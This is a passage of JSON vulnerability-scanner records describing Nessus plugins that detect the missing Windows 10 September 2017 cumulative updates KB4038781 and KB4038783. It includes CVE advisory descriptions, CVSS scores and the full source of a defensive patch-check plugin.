Graphics Device Interface (GDI) handles objects in memory, allowing an attacker to retrieve information from a targeted system. By itself, the information disclosure does not allow arbitrary code execution; however, it could allow arbitrary code to be run if the attacker uses it in combination with another vulnerability. (CVE-2017-8688)\n\n - A remote code execution vulnerability exists due to the way Windows Uniscribe handles objects in memory. An attacker who successfully exploited this vulnerability could take control of the affected system. An attacker could then install programs; view, change, or delete data; or create new accounts with full user rights.\n (CVE-2017-8692)\n\n - An elevation of privilege vulnerability exists in Windows when the Windows kernel-mode driver fails to properly handle objects in memory. An attacker who successfully exploited this vulnerability could run arbitrary code in kernel mode. An attacker could then install programs; view, change, or delete data; or create new accounts with full user rights.\n (CVE-2017-8675)\n\n - A spoofing vulnerability exists when Microsoft Edge does not properly parse HTTP content. An attacker who successfully exploited this vulnerability could trick a user by redirecting the user to a specially crafted website. The specially crafted website could either spoof content or serve as a pivot to chain an attack with other vulnerabilities in web services.\n (CVE-2017-8735)\n\n - A spoofing vulnerability exists when Internet Explorer improperly handles specific HTML content. An attacker who successfully exploited this vulnerability could trick a user into believing that the user was visiting a legitimate website. The specially crafted website could either spoof content or serve as a pivot to chain an attack with other vulnerabilities in web services.\n (CVE-2017-8733)\n\n - A remote code execution vulnerability exists when Microsoft browsers improperly access objects in memory.\n The vulnerability could corrupt memory in such a way that an attacker could execute arbitrary code in the context of the current user. (CVE-2017-8750)\n\n - An information disclosure vulnerability exists when the Windows kernel fails to properly initialize a memory address, allowing an attacker to retrieve information that could lead to a Kernel Address Space Layout Randomization (KASLR) bypass. An attacker who successfully exploited this vulnerability could retrieve the base address of the kernel driver from a compromised process. (CVE-2017-8708)\n\n - A remote code execution vulnerability exists when the Windows font library improperly handles specially crafted embedded fonts. An attacker who successfully exploited this vulnerability could take control of the affected system. An attacker could then install programs; view, change, or delete data; or create new accounts with full user rights. (CVE-2017-8682)\n\n - An elevation of privilege vulnerability exists in Windows Error Reporting (WER) when WER handles and executes files. The vulnerability could allow elevation of privilege if an attacker can successfully exploit it.\n An attacker who successfully exploited the vulnerability could gain greater access to sensitive information and system functionality. (CVE-2017-8702)\n\n - A remote code execution vulnerability exists when Windows Shell does not properly validate file copy destinations. An attacker who successfully exploited the vulnerability could run arbitrary code in the context of the current user. If the current user is logged on with administrative user rights, an attacker could take control of the affected system. An attacker could then install programs; view, change, or delete data; or create new accounts with full user rights. Users whose accounts are configured to have fewer user rights on the system could be less impacted than users who operate with administrative user rights. (CVE-2017-8699) \n - An information disclosure vulnerability exists in Microsoft browsers in the scripting engines due to improper handling of objects in memory. An unauthenticated, remote attacker can exploit this, by convincing a user to visit a specially crafted website, to disclose files on a user's computer. (CVE-2017-8529)", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 8.8, "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.0", "userInteraction": "REQUIRED"}, "impactScore": 5.9}, "published": "2017-11-03T00:00:00", "type": "nessus", "title": "KB4038781: Windows 10 September 2017 Cumulative Update", "bulletinFamily": "scanner", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2017-0161", "CVE-2017-11766", "CVE-2017-8529", "CVE-2017-8628", "CVE-2017-8643", "CVE-2017-8675", "CVE-2017-8676", "CVE-2017-8677", "CVE-2017-8678", "CVE-2017-8679", "CVE-2017-8681", "CVE-2017-8682", "CVE-2017-8683", "CVE-2017-8687", "CVE-2017-8688", "CVE-2017-8692", "CVE-2017-8695", "CVE-2017-8699", "CVE-2017-8702", "CVE-2017-8706", "CVE-2017-8707", "CVE-2017-8708", "CVE-2017-8709", "CVE-2017-8713", "CVE-2017-8719", "CVE-2017-8720", "CVE-2017-8723", "CVE-2017-8728", "CVE-2017-8733", "CVE-2017-8734", "CVE-2017-8735", "CVE-2017-8736", "CVE-2017-8737", "CVE-2017-8738", "CVE-2017-8741", "CVE-2017-8747", "CVE-2017-8748", "CVE-2017-8749", "CVE-2017-8750", "CVE-2017-8753", "CVE-2017-8754", "CVE-2017-8756", "CVE-2017-8757", "CVE-2017-8759"], "modified": "2021-11-30T00:00:00", "cpe": ["cpe:/o:microsoft:windows"], "id": "SMB_NT_MS17_SEP_4038781.NASL", "href": "https://www.tenable.com/plugins/nessus/104385", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from the Microsoft Security Updates API. The text\n# itself is copyright (C) Microsoft Corporation.\n#\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(104385);\n script_version(\"1.9\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/11/30\");\n\n script_cve_id(\n \"CVE-2017-0161\",\n \"CVE-2017-8529\",\n \"CVE-2017-8628\",\n \"CVE-2017-8643\",\n \"CVE-2017-8675\",\n \"CVE-2017-8676\",\n \"CVE-2017-8677\",\n \"CVE-2017-8678\",\n \"CVE-2017-8679\",\n \"CVE-2017-8681\",\n \"CVE-2017-8682\",\n \"CVE-2017-8683\",\n \"CVE-2017-8687\",\n \"CVE-2017-8688\",\n \"CVE-2017-8692\",\n \"CVE-2017-8695\",\n \"CVE-2017-8699\",\n \"CVE-2017-8702\",\n \"CVE-2017-8706\",\n \"CVE-2017-8707\",\n \"CVE-2017-8708\",\n \"CVE-2017-8709\",\n \"CVE-2017-8713\",\n \"CVE-2017-8719\",\n \"CVE-2017-8720\",\n \"CVE-2017-8723\",\n \"CVE-2017-8728\",\n \"CVE-2017-8733\",\n \"CVE-2017-8734\",\n \"CVE-2017-8735\",\n \"CVE-2017-8736\",\n \"CVE-2017-8737\",\n \"CVE-2017-8738\",\n \"CVE-2017-8741\",\n \"CVE-2017-8747\",\n \"CVE-2017-8748\",\n \"CVE-2017-8749\",\n \"CVE-2017-8750\",\n \"CVE-2017-8753\",\n \"CVE-2017-8754\",\n \"CVE-2017-8756\",\n \"CVE-2017-8757\",\n \"CVE-2017-8759\",\n \"CVE-2017-11766\"\n );\n script_bugtraq_id(\n 98953,\n 100718,\n 100720,\n 100721,\n 100727,\n 100728,\n 100729,\n 100736,\n 100737,\n 100738,\n 100739,\n 100740,\n 100742,\n 100743,\n 100744,\n 100747,\n 100749,\n 100752,\n 100755,\n 100756,\n 100759,\n 100762,\n 100764,\n 100765,\n 100766,\n 100767,\n 100768,\n 100769,\n 100770,\n 100771,\n 100772,\n 100773,\n 100776,\n 100779,\n 100781,\n 100783,\n 100785,\n 100789,\n 100790,\n 100791,\n 100792,\n 100796,\n 100803,\n 100804\n );\n script_xref(name:\"MSKB\", value:\"4038781\");\n script_xref(name:\"MSFT\", value:\"MS17-4038781\");\n script_xref(name:\"CISA-KNOWN-EXPLOITED\", value:\"2022/05/03\");\n\n script_name(english:\"KB4038781: Windows 10 September 2017 Cumulative Update\");\n script_summary(english:\"Checks for rollup.\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote Windows host is affected by multiple vulnerabilities.\");\n script_set_attribute(attribute:\"description\", value:\n\"The remote Windows host is missing security update 4038781.\nIt is, therefore, affected by multiple vulnerabilities :\n\n - A remote code execution vulnerability exists when\n Microsoft Windows PDF Library improperly handles objects\n in memory. The vulnerability could corrupt memory in a\n way that enables an attacker to execute arbitrary code\n in the context of the current user. An attacker who\n successfully exploited the vulnerability could gain the\n same user rights as the current user. If the current\n user is logged on with administrative user rights, an\n attacker could take control of an affected system. An\n attacker could then install programs; view, change, or\n delete data; or create new accounts with full user\n rights. (CVE-2017-8728, CVE-2017-8737)\n\n - An information disclosure vulnerability exists when\n Windows Hyper-V on a host operating system fails to\n properly validate input from an authenticated user on a\n guest operating system. (CVE-2017-8706, CVE-2017-8707,\n CVE-2017-8713)\n\n - An information disclosure vulnerability exists when the\n Microsoft Windows Graphics Component improperly handles\n objects in memory. An attacker who successfully\n exploited the vulnerability could obtain information to\n further compromise the users system. (CVE-2017-8683)\n\n - An Information disclosure vulnerability exists in\n Windows kernel that could allow an attacker to retrieve\n information that could lead to a Kernel Address Space\n Layout Randomization (KASLR) bypass. An attacker who\n successfully exploited this vulnerability could retrieve\n the memory address of a kernel object. (CVE-2017-8687)\n\n - A remote code execution vulnerability exists when\n Microsoft Edge improperly accesses objects in memory.\n The vulnerability could corrupt memory in such a way\n that enables an attacker to execute arbitrary code in\n the context of the current user. An attacker who\n successfully exploited the vulnerability could gain the\n same user rights as the current user. (CVE-2017-8734)\n\n - An information disclosure vulnerability exists in the\n way that the Windows Graphics Device Interface (GDI)\n handles objects in memory, allowing an attacker to\n retrieve information from a targeted system. By itself,\n the information disclosure does not allow arbitrary code\n execution; however, it could allow arbitrary code to be\n run if the attacker uses it in combination with another\n vulnerability. (CVE-2017-8676)\n\n - A remote code execution vulnerability exists in the way\n that Microsoft browser JavaScript engines render content\n when handling objects in memory. The vulnerability could\n corrupt memory in such a way that an attacker could\n execute arbitrary code in the context of the current\n user. In a web-based attack scenario, an attacker could\n host a specially crafted website that is designed to\n exploit the vulnerability through Microsoft browsers and\n then convince a user to view the website. An attacker\n could also embed an ActiveX control marked "safe\n for initialization" in an application or Microsoft\n Office document that hosts the related rendering engine.\n The attacker could also take advantage of compromised\n websites, and websites that accept or host user-provided\n content or advertisements. These websites could contain\n specially crafted content that could exploit the\n vulnerability. An attacker who successfully exploited\n the vulnerability could gain the same user rights as the\n current user. (CVE-2017-8741, CVE-2017-8748)\n\n - A remote code execution vulnerability exists in the way\n that the scripting engine handles objects in memory in\n Microsoft Edge. The vulnerability could corrupt memory\n in such a way that an attacker could execute arbitrary\n code in the context of the current user. An attacker who\n successfully exploited the vulnerability could gain the\n same user rights as the current user. (CVE-2017-8738,\n CVE-2017-8753, CVE-2017-8756)\n\n - A race condition that could lead to a remote code\n execution vulnerability exists in NetBT Session Services\n when NetBT fails to maintain certain sequencing\n requirements. (CVE-2017-0161)\n\n - A remote code execution vulnerability exists in the way\n Microsoft Edge handles objects in memory. The\n vulnerability could corrupt memory in such a way that an\n attacker could execute arbitrary code in the context of\n the current user. An attacker who successfully exploited\n the vulnerability could gain the same user rights as the\n current user. (CVE-2017-8757)\n\n - A remote code execution vulnerability exists when\n Internet Explorer improperly accesses objects in memory.\n The vulnerability could corrupt memory in such a way\n that an attacker could execute arbitrary code in the\n context of the current user. (CVE-2017-8747,\n CVE-2017-8749)\n\n - An elevation of privilege vulnerability exists in\n Windows when the Win32k component fails to properly\n handle objects in memory. An attacker who successfully\n exploited this vulnerability could run arbitrary code in\n kernel mode. An attacker could then install programs;\n view, change, or delete data; or create new accounts\n with full user rights. (CVE-2017-8720)\n\n - An information disclosure vulnerability exists when\n Windows Uniscribe improperly discloses the contents of\n its memory. An attacker who successfully exploited the\n vulnerability could obtain information to further\n compromise the users system. There are multiple ways an\n attacker could exploit the vulnerability, such as by\n convincing a user to open a specially crafted document\n or by convincing a user to visit an untrusted webpage.\n The update addresses the vulnerability by correcting how\n Windows Uniscribe handles objects in memory.\n (CVE-2017-8695)\n\n - An information disclosure vulnerability exists when\n Microsoft Edge improperly handles clipboard events. For\n an attack to be successful, an attacker must persuade a\n user to visit a malicious website and leave it open\n during clipboard activities. The update addresses the\n vulnerability by changing how Microsoft Edge handles\n clipboard events in the browser. (CVE-2017-8643)\n\n - A spoofing vulnerability exists in Microsoft's\n implementation of the Bluetooth stack. An attacker who\n successfully exploited this vulnerability could perform\n a man-in-the-middle attack and force a user's computer\n to unknowingly route traffic through the attacker's\n computer. The attacker can then monitor and read the\n traffic before sending it on to the intended recipient.\n (CVE-2017-8628)\n\n - An information disclosure vulnerability exists in\n Microsoft browsers due to improper parent domain\n verification in certain functionality. An attacker who\n successfully exploited the vulnerability could obtain\n specific information that is used in the parent domain.\n (CVE-2017-8736)\n\n - An information disclosure vulnerability exists when the\n Windows kernel improperly handles objects in memory. An\n attacker who successfully exploited this vulnerability\n could obtain information to further compromise the users\n system. (CVE-2017-8678, CVE-2017-8679, CVE-2017-8709,\n CVE-2017-8719)\n\n - A vulnerability exists when Microsoft Edge improperly\n accesses objects in memory. The vulnerability could\n corrupt memory in such a way that an attacker could\n execute arbitrary code in the context of the current\n user. (CVE-2017-11766)\n\n - A security feature bypass exists in Microsoft Edge when\n the Edge Content Security Policy (CSP) fails to properly\n validate certain specially crafted documents. An\n attacker who exploited the bypass could trick a user\n into loading a page containing malicious content.\n (CVE-2017-8723, CVE-2017-8754)\n\n - A remote code execution vulnerability exists when\n Microsoft .NET Framework processes untrusted input. An\n attacker who successfully exploited this vulnerability\n in software using the .NET framework could take control\n of an affected system. An attacker could then install\n programs; view, change, or delete data; or create new\n accounts with full user rights. Users whose accounts are\n configured to have fewer user rights on the system could\n be less impacted than users who operate with\n administrative user rights. (CVE-2017-8759)\n\n - A information disclosure vulnerability exists when the\n Windows GDI+ component improperly discloses kernel\n memory addresses. An attacker who successfully exploited\n the vulnerability could obtain information to further\n compromise the users system. (CVE-2017-8677,\n CVE-2017-8681)\n\n - An information disclosure vulnerability exists in the\n way that the Windows Graphics Device Interface (GDI)\n handles objects in memory, allowing an attacker to\n retrieve information from a targeted system. By itself,\n the information disclosure does not allow arbitrary code\n execution; however, it could allow arbitrary code to be\n run if the attacker uses it in combination with another\n vulnerability. (CVE-2017-8688)\n\n - A remote code execution vulnerability exists due to the\n way Windows Uniscribe handles objects in memory. An\n attacker who successfully exploited this vulnerability\n could take control of the affected system. An attacker\n could then install programs; view, change, or delete\n data; or create new accounts with full user rights.\n (CVE-2017-8692)\n\n - An elevation of privilege vulnerability exists in\n Windows when the Windows kernel-mode driver fails to\n properly handle objects in memory. An attacker who\n successfully exploited this vulnerability could run\n arbitrary code in kernel mode. An attacker could then\n install programs; view, change, or delete data; or\n create new accounts with full user rights.\n (CVE-2017-8675)\n\n - A spoofing vulnerability exists when Microsoft Edge does\n not properly parse HTTP content. An attacker who\n successfully exploited this vulnerability could trick a\n user by redirecting the user to a specially crafted\n website. The specially crafted website could either\n spoof content or serve as a pivot to chain an attack\n with other vulnerabilities in web services.\n (CVE-2017-8735)\n\n - A spoofing vulnerability exists when Internet Explorer\n improperly handles specific HTML content. An attacker\n who successfully exploited this vulnerability could\n trick a user into believing that the user was visiting a\n legitimate website. The specially crafted website could\n either spoof content or serve as a pivot to chain an\n attack with other vulnerabilities in web services.\n (CVE-2017-8733)\n\n - A remote code execution vulnerability exists when\n Microsoft browsers improperly access objects in memory.\n The vulnerability could corrupt memory in such a way\n that an attacker could execute arbitrary code in the\n context of the current user. (CVE-2017-8750)\n\n - An information disclosure vulnerability exists when the\n Windows kernel fails to properly initialize a memory\n address, allowing an attacker to retrieve information\n that could lead to a Kernel Address Space Layout\n Randomization (KASLR) bypass. An attacker who\n successfully exploited this vulnerability could retrieve\n the base address of the kernel driver from a compromised\n process. (CVE-2017-8708)\n\n - A remote code execution vulnerability exists when the\n Windows font library improperly handles specially\n crafted embedded fonts. An attacker who successfully\n exploited this vulnerability could take control of the\n affected system. An attacker could then install\n programs; view, change, or delete data; or create new\n accounts with full user rights. (CVE-2017-8682)\n\n - An elevation of privilege vulnerability exists in\n Windows Error Reporting (WER) when WER handles and\n executes files. The vulnerability could allow elevation\n of privilege if an attacker can successfully exploit it.\n An attacker who successfully exploited the vulnerability\n could gain greater access to sensitive information and\n system functionality. (CVE-2017-8702)\n\n - A remote code execution vulnerability exists when\n Windows Shell does not properly validate file copy\n destinations. An attacker who successfully exploited the\n vulnerability could run arbitrary code in the context of\n the current user. If the current user is logged on with\n administrative user rights, an attacker could take\n control of the affected system. An attacker could then\n install programs; view, change, or delete data; or\n create new accounts with full user rights. Users whose\n accounts are configured to have fewer user rights on the\n system could be less impacted than users who operate\n with administrative user rights. (CVE-2017-8699)\n \n - An information disclosure vulnerability exists in\n Microsoft browsers in the scripting engines due to\n improper handling of objects in memory. An\n unauthenticated, remote attacker can exploit this, by\n convincing a user to visit a specially crafted website,\n to disclose files on a user's computer. (CVE-2017-8529)\");\n # https://support.microsoft.com/en-us/help/4038781/windows-10-update-kb4038781\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?7c29dee1\");\n script_set_attribute(attribute:\"solution\", value:\n\"Apply security update KB4038781.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:H/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2017-8759\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_core\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_canvas\", value:\"true\");\n script_set_attribute(attribute:\"canvas_package\", value:'CANVAS');\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2017/09/12\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2017/09/12\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2017/11/03\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:microsoft:windows\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Windows : Microsoft Bulletins\");\n\n script_copyright(english:\"This script is Copyright (C) 2017-2021 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"smb_check_rollup.nasl\", \"smb_hotfixes.nasl\", \"ms_bulletin_checks_possible.nasl\");\n script_require_keys(\"SMB/MS_Bulletin_Checks/Possible\");\n script_require_ports(139, 445, \"Host/patch_management_checks\");\n\n exit(0);\n}\n\ninclude(\"audit.inc\");\ninclude(\"smb_hotfixes_fcheck.inc\");\ninclude(\"smb_hotfixes.inc\");\ninclude(\"smb_func.inc\");\ninclude(\"misc_func.inc\");\n\nget_kb_item_or_exit(\"SMB/MS_Bulletin_Checks/Possible\");\n\nbulletin = \"MS17-09\";\nkbs = make_list('4038781');\n\nif (get_kb_item(\"Host/patch_management_checks\")) hotfix_check_3rd_party(bulletin:bulletin, kbs:kbs, severity:SECURITY_HOLE);\n\nget_kb_item_or_exit(\"SMB/Registry/Enumerated\");\nget_kb_item_or_exit(\"SMB/WindowsVersion\", exit_code:1);\nos_name = get_kb_item_or_exit(\"SMB/ProductName\");\n\nif (hotfix_check_sp_range(win10:'0') <= 0) audit(AUDIT_OS_SP_NOT_VULN);\nif(\"LTSB\" >!< os_name) audit(AUDIT_OS_NOT, \"Windows 10 version 1507 LTSB\");\n\nshare = hotfix_get_systemdrive(as_share:TRUE, exit_on_fail:TRUE);\nif (!is_accessible_share(share:share)) audit(AUDIT_SHARE_FAIL, share);\n\nif (\n smb_check_rollup(os:\"10\",\n sp:0,\n os_build:\"10240\",\n rollup_date:\"09_2017\",\n bulletin:bulletin,\n rollup_kb_list:[4038781])\n)\n{\n replace_kb_item(name:'SMB/Missing/'+bulletin, value:TRUE);\n hotfix_security_hole();\n hotfix_check_fversion_end();\n exit(0);\n}\nelse\n{\n hotfix_check_fversion_end();\n audit(AUDIT_HOST_NOT, hotfix_get_audit_report());\n}\n", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2023-01-11T14:34:12", "description": "The remote Windows host is missing security update 4038783.\nIt is, therefore, affected by multiple vulnerabilities :\n\n - A race condition that could lead to a remote code execution vulnerability exists in NetBT Session Services when NetBT fails to maintain certain sequencing requirements. (CVE-2017-0161)\n\n - A vulnerability exists when Microsoft Edge improperly accesses objects in memory. The vulnerability could corrupt memory in such a way that an attacker could execute arbitrary code in the context of the current user. (CVE-2017-11766)\n\n - A spoofing vulnerability exists in Microsoft's implementation of the Bluetooth stack. An attacker who successfully exploited this vulnerability could perform a man-in-the-middle attack and force a user's computer to unknowingly route traffic through the attacker's computer. The attacker can then monitor and read the traffic before sending it on to the intended recipient.\n (CVE-2017-8628)\n\n - An information disclosure vulnerability exists when Microsoft Edge improperly handles clipboard events. For an attack to be successful, an attacker must persuade a user to visit a malicious website and leave it open during clipboard activities. The update addresses the vulnerability by changing how Microsoft Edge handles clipboard events in the browser. (CVE-2017-8643)\n\n - An elevation of privilege vulnerability exists in Windows when the Windows kernel-mode driver fails to properly handle objects in memory. An attacker who successfully exploited this vulnerability could run arbitrary code in kernel mode. An attacker could then install programs; view, change, or delete data; or create new accounts with full user rights. To exploit this vulnerability, an attacker would first have to log on to the system. An attacker could then run a specially crafted application that could exploit the vulnerability and take control of an affected system. The update addresses this vulnerability by correcting how the Windows kernel-mode driver handles objects in memory.\n (CVE-2017-8675)\n\n - An information disclosure vulnerability exists in the way that the Windows Graphics Device Interface (GDI) handles objects in memory, allowing an attacker to retrieve information from a targeted system. By itself, the information disclosure does not allow arbitrary code execution; however, it could allow arbitrary code to be run if the attacker uses it in combination with another vulnerability. (CVE-2017-8676)\n\n - A information disclosure vulnerability exists when the Windows GDI+ component improperly discloses kernel memory addresses. An attacker who successfully exploited the vulnerability could obtain information to further compromise the users system.\n (CVE-2017-8677, CVE-2017-8681)\n\n - A remote code execution vulnerability exists when the Windows font library improperly handles specially crafted embedded fonts. An attacker who successfully exploited this vulnerability could take control of the affected system. An attacker could then install programs; view, change, or delete data; or create new accounts with full user rights.(CVE-2017-8682)\n\n - An information disclosure vulnerability exists when the Microsoft Windows Graphics Component improperly handles objects in memory. An attacker who successfully exploited the vulnerability could obtain information to further compromise the users system.\n (CVE-2017-8683)\n\n - An Information disclosure vulnerability exists in Windows kernel that could allow an attacker to retrieve information that could lead to a Kernel Address Space Layout Randomization (KASLR) bypass. An attacker who successfully exploited this vulnerability could retrieve the memory address of a kernel object. (CVE-2017-8687)\n\n - An information disclosure vulnerability exists in the way that the Windows Graphics Device Interface+ (GDI+) handles objects in memory, allowing an attacker to retrieve information from a targeted system.\n (CVE-2017-8688)\n\n - A remote code execution vulnerability exists due to the way Windows Uniscribe handles objects in memory. An attacker who successfully exploited this vulnerability could take control of the affected system. An attacker could then install programs; view, change, or delete data; or create new accounts with full user rights.\n (CVE-2017-8692)\n\n - An information disclosure vulnerability exists when Windows Uniscribe improperly discloses the contents of its memory. An attacker who successfully exploited the vulnerability could obtain information to further compromise the users system.\n (CVE-2017-8695)\n\n - A remote code execution vulnerability exists when Windows Shell does not properly validate file copy destinations. An attacker who successfully exploited the vulnerability could run arbitrary code in the context of the current user. (CVE-2017-8699)\n\n - An elevation of privilege vulnerability exists in Windows Error Reporting (WER) when WER handles and executes files. The vulnerability could allow elevation of privilege if an attacker can successfully exploit it.\n An attacker who successfully exploited the vulnerability could gain greater access to sensitive information and system functionality.\n (CVE-2017-8702)\n\n - An information disclosure vulnerability exists when Windows Hyper-V on a host operating system fails to properly validate input from an authenticated user on a guest operating system.\n (CVE-2017-8706, CVE-2017-8707)\n\n - An information disclosure vulnerability exists when the Windows kernel fails to properly initialize a memory address, allowing an attacker to retrieve information that could lead to a Kernel Address Space Layout Randomization (KASLR) bypass. An attacker who successfully exploited this vulnerability could retrieve the base address of the kernel driver from a compromised process. (CVE-2017-8708)\n\n - An information disclosure vulnerability exists when Windows Hyper-V on a host operating system fails to properly validate input from an authenticated user on a guest operating system.\n (CVE-2017-8706, CVE-2017-8707, CVE-2017-8713)\n\n - An information disclosure vulnerability exists when the Windows kernel improperly handles objects in memory. An attacker who successfully exploited this vulnerability could obtain information to further compromise the users system.(CVE-2017-8678, CVE-2017-8679, CVE-2017-8709, CVE-2017-8719)\n\n - An elevation of privilege vulnerability exists in Windows when the Win32k component fails to properly handle objects in memory. An attacker who successfully exploited this vulnerability could run arbitrary code in kernel mode. An attacker could then install programs;\n view, change, or delete data; or create new accounts with full user rights.(CVE-2017-8720)\n\n - A spoofing vulnerability exists when Internet Explorer improperly handles specific HTML content. An attacker who successfully exploited this vulnerability could trick a user into believing that the user was visiting a legitimate website. The specially crafted website could either spoof content or serve as a pivot to chain an attack with other vulnerabilities in web services.\n (CVE-2017-8733)\n\n - A remote code execution vulnerability exists when Microsoft Edge improperly accesses objects in memory.\n The vulnerability could corrupt memory in such a way that enables an attacker to execute arbitrary code in the context of the current user. An attacker who successfully exploited the vulnerability could gain the same user rights as the current user.(CVE-2017-8734)\n\n - A spoofing vulnerability exists when Microsoft Edge does not properly parse HTTP content. An attacker who successfully exploited this vulnerability could trick a user by redirecting the user to a specially crafted website. The specially crafted website could either spoof content or serve as a pivot to chain an attack with other vulnerabilities in web services.\n (CVE-2017-8735)\n\n - An information disclosure vulnerability exists in Microsoft browsers due to improper parent domain verification in certain functionality. An attacker who successfully exploited the vulnerability could obtain specific information that is used in the parent domain.\n (CVE-2017-8736)\n\n - A remote code execution vulnerability exists when Microsoft Windows PDF Library improperly handles objects in memory. The vulnerability could corrupt memory in a way that enables an attacker to execute arbitrary code in the context of the current user. An attacker who successfully exploited the vulnerability could gain the same user rights as the current user.\n (CVE-2017-8728, CVE-2017-8737)\n\n - A remote code execution vulnerability exists in the way that Microsoft browser JavaScript engines render content when handling objects in memory. The vulnerability could corrupt memory in such a way that an attacker could execute arbitrary code in the context of the current user. (CVE-2017-8660, CVE-2017-8741, CVE-2017-8748)\n\n - A remote code execution vulnerability exists when Internet Explorer improperly accesses objects in memory.\n The vulnerability could corrupt memory in such a way that an attacker could execute arbitrary code in the context of the current user. (CVE-2017-8747, CVE-2017-8749)\n\n - A remote code execution vulnerability exists when Microsoft browsers improperly access objects in memory.\n The vulnerability could corrupt memory in such a way that an attacker could execute arbitrary code in the context of the current user. (CVE-2017-8750)\n\n - A security feature bypass exists in Microsoft Edge when the Edge Content Security Policy (CSP) fails to properly validate certain specially crafted documents. An attacker who exploited the bypass could trick a user into loading a page containing malicious content.\n (CVE-2017-8723, CVE-2017-8754)\n\n - A remote code execution vulnerability exists in the way that the scripting engine handles objects in memory in Microsoft Edge. The vulnerability could corrupt memory in such a way that an attacker could execute arbitrary code in the context of the current user. An attacker who successfully exploited the vulnerability could gain the same user rights as the current user.\n (CVE-2017-8738, CVE-2017-8752, CVE-2017-8753, CVE-2017-8755, CVE-2017-8756)\n\n - A remote code execution vulnerability exists in the way Microsoft Edge handles objects in memory. The vulnerability could corrupt memory in such a way that an attacker could execute arbitrary code in the context of the current user. An attacker who successfully exploited the vulnerability could gain the same user rights as the current user. (CVE-2017-8757)\n\n - A remote code execution vulnerability exists when Microsoft .NET Framework processes untrusted input. An attacker who successfully exploited this vulnerability in software using the .NET framework could take control of an affected system. An attacker could then install programs; view, change, or delete data; or create new accounts with full user rights. (CVE-2017-8759) \n - An information disclosure vulnerability exists in Microsoft browsers in the scripting engines due to improper handling of objects in memory. An unauthenticated, remote attacker can exploit this, by convincing a user to visit a specially crafted website, to disclose files on a user's computer. (CVE-2017-8529)", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 8.8, "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.0", "userInteraction": "REQUIRED"}, "impactScore": 5.9}, "published": "2017-09-12T00:00:00", "type": "nessus", "title": "KB4038783: Windows 10 Version 1511 September 2017 Cumulative Update", "bulletinFamily": "scanner", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2017-0161", "CVE-2017-11766", "CVE-2017-8529", "CVE-2017-8628", "CVE-2017-8643", "CVE-2017-8660", "CVE-2017-8675", "CVE-2017-8676", "CVE-2017-8677", "CVE-2017-8678", "CVE-2017-8679", "CVE-2017-8681", "CVE-2017-8682", "CVE-2017-8683", "CVE-2017-8687", "CVE-2017-8688", "CVE-2017-8692", "CVE-2017-8695", "CVE-2017-8699", "CVE-2017-8702", "CVE-2017-8706", "CVE-2017-8707", "CVE-2017-8708", "CVE-2017-8709", "CVE-2017-8713", "CVE-2017-8719", "CVE-2017-8720", "CVE-2017-8723", "CVE-2017-8728", "CVE-2017-8733", "CVE-2017-8734", "CVE-2017-8735", "CVE-2017-8736", "CVE-2017-8737", "CVE-2017-8738", "CVE-2017-8741", "CVE-2017-8747", "CVE-2017-8748", "CVE-2017-8749", "CVE-2017-8750", "CVE-2017-8752", "CVE-2017-8753", 